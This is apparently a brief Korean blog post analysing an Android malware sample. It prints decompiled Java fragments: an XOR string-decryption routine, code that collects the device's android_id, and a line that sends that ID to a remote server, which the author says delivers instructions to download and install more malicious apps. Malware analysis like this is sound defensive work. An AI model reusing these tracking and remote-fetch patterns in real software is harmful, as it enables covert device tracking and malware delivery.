내 기억 상으로는 처음 봄.






Byte로 된 배열 복호화에 이용되는 메소드



  public static String DecryptByteArray(byte[] paramArrayOfByte, int paramInt)

 {

   byte[] arrayOfByte = "dns".getBytes();

   int i = 0;

   for (;;)

   {

     if (i >= paramInt) {

     System.out.println(new String(paramArrayOfByte));

       return new String(paramArrayOfByte);

     }

     paramArrayOfByte[i] = ((byte)(paramArrayOfByte[i] ^ arrayOfByte[0]));

     i += 1;

   }

 }



감염된 기기의 고유 ID를 인스턴스 변수에 저장한다.


this.d = Settings.Secure.getString(getApplicationContext().getContentResolver(), "android_id");


그리고 Thread에서 아래의 코드를 통해 JSON으로 파싱한 뒤, 악성앱 다운로드와 악성앱 설치가 이루어질 것으로 보인다. 다만 까탈 스러운 점이 기기가 감염이 되어야 JSON 파싱이 가능하다는 점이다. 그래서 수집이 어렵다.


bufferedreader = new BufferedReader(new InputStreamReader((new URL((new StringBuilder(String.valueOf(MyService.c(a)))).append(MyService.k(a)).append("deviceid=").append(MyService.e(a)).toString())).openStream()));


stringbuilder = new StringBuilder();


s4 = bufferedreader.readLine();



Posted by Ec0nomist